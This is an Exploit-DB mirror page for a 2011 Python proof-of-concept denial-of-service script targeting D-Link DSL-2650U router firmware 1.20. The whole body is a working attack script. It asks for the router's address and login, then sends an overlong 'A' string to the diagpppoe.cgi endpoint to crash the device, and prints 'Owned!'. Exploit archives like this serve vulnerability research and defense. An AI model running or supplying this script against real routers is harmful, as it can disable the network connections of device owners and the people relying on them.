exploit-db-mirror/exploits/hardware/dos/17501.py
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

22 lines
No EOL
740 B
Python
Executable file

# Exploit Title: Dlink DSL-2650U DoS/PoC
# Date: July 6th, 2011
# Author: Li'el Fridman
# Software Link:
ftp://ftp.dlink.ru/pub/ADSL/DSL-2650U_BRU_D/Firmware/RU_1.20/DSL-2650U_BRU_D1_RU_1.20_06222011.zip
# Version: 1.20
# Tested on: Default firmware - Linux 2.6.8.1
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
import urllib
ip = raw_input('Please enter the router address: ')
username = raw_input('Please enter the router user name: ')
password = raw_input('Please enter the router password: ')
path = 'http://{0}:{1}@{2}/diagpppoe.cgi?diagPrev=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.format(username, password, ip)
print 'Trying {0}'.format(path)
opener = urllib.urlopen(path)
print 'Owned!'